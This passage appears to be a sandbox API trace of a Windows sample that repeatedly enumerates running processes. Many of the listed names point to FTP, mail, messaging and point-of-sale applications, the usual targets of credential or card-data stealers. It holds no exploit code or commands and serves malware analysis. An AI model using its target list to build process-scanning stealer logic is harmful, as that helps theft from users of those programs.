th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0214.640] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0214.643] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0214.645] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0214.647] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0214.649] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0214.651] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.652] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0214.655] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.657] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.661] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0214.663] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.666] Process32Next (in: hSnapshot=0x2170, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0214.668] CloseHandle (hObject=0x2170) returned 1 [0214.668] Sleep (dwMilliseconds=0x64) [0214.774] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2138 [0214.789] Process32First (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.790] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0214.792] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0214.794] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.796] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.797] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.800] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.801] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.803] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.804] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.806] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.808] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.809] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.848] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.850] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.852] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.854] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.856] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.857] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.859] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.861] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0214.863] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.864] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0214.866] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.868] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0214.869] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0214.871] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0214.873] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0214.875] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.877] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.878] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.880] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.881] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0214.883] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.957] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.959] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.960] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0214.962] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0214.964] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0214.965] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0214.969] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0214.971] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0214.973] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0214.975] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0214.976] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0214.977] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0214.979] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0214.980] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0214.982] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0214.984] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0214.985] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0214.987] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0214.989] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0214.990] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0214.996] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0214.998] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0214.999] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0215.001] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0215.009] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0215.011] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0215.013] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0215.015] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0215.017] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0215.019] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0215.021] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0215.023] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0215.025] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0215.027] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0215.029] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0215.032] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0215.034] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0215.036] Process32Next (in: hSnapshot=0x2138, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0215.049] Process32Next (in: 